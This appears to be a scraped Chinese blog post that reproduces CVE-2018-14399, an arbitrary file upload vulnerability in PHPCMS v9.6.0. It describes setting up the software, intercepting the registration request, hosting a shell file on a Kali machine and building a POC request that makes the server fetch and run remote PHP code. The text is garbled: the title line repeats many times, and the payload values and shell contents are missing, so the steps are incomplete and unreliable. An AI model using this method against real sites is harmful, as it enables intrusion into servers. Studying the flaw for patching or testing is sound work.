一,下载安装phpcmsv966.0
1,下载官方下载phpcms v9.6.0版本,下载地址: http://download.phpcms.cn/v9/9.6/下载之后,将源码都解压到phpstudy的www目录,浏览器访问源码中的install目录,一步步安装
phpcms attachment.class.php路径,2019-11-9:phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399) 2,打开后台管理,进入后台,后台账号密码为之前安装时候设置的账号密码
phpcms attachment.class.php路径,2019-11-9:phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399) phpcms attachment.class.php路径,2019-11-9:phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399) 二、漏洞复现
1,查询资料可知,任意文件上传漏洞出现在,PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的校验。远程攻击者可以利用该漏洞上传并执行任意的PHP代码。
2,漏洞利用,在phpcms注册界面,填写信息进行抓包
phpcms attachment.class.php路径,2019-11-9:phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399) 3、在另一个系统(kali),开启web服务,然后在web根目录下创建一个txt文件,写入如下信息
vim shell.txt
phpcms attachment.class.php路径,2019-11-9:phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399) 4. 构造POC
siteid=1&modelid=11&username=test2&password=test2123&[email protected]&info[content]=
phpcms attachment.class.php路径,2019-11-9:phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399) &dosubmit=1&protocol=
phpcms attachment.class.php路径,2019-11-9:phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399) 5,访问得到的上传路径,可以看到脚本正常执行
phpcms attachment.class.php路径,2019-11-9:phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399) phpcms attachment.class.php路径,2019-11-9:phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399) 标签:11,文件,漏洞,v9.6,phpcms,后台,上传,下载
来源: https://www.cnblogs.com/sym945/p/11825504.html
